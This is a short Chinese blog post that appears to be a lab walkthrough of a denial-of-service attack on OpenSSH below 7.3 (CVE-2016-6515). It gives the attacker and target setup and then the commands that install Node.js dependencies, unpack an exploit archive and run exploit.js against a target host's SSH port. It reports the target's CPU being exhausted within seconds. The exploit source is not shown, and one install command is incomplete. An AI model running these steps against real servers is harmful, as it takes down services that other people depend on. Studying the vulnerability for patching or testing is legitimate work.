OpenSSH是一款开源的安全远程登陆工具,也是Linux系统中最常用的服务之一,近年来频繁爆出高危漏洞,深受各大企业关注。一般情况下,OpenSSH经过安全加固后是几乎不可能在短时间内暴力密码攻破的,更多时候需要防范拒绝服务攻击。
实验环境
攻击系统:Kali 2019.4
目标系统:RHEL 6.10
目标地址:192.168.1.100
目标服务:OpenSSH 7.2p2
漏洞信息:CVE-2016-6515
影响范围:Openssh < 7.3
攻击原理:OpenSSH未限制密码验证中的密码长度,远程攻击者通过较长的字符串可造成拒绝服务。
模拟攻击
第一步 安装依赖包
- root@Kali:~# apt-get install
- root@Kali:~# npm install ssh2
- root@Kali:~# npm install commander
第二步 解压利用代码工具
- root@Kali:~# tar xzf CVE-2016-6515.tar.gz
第三步 攻击目标系统OpenSSH
- root@Kali:~# ./CVE-2016-6515/exploit.js -h 192.168.1.100 -p 22 -u root
被攻系统状况
短短数秒钟后,目标系统CPU可用率为0%,基本瘫痪!
您可以选择一种方式赞助本站
支付宝扫一扫
微信扫一扫
赏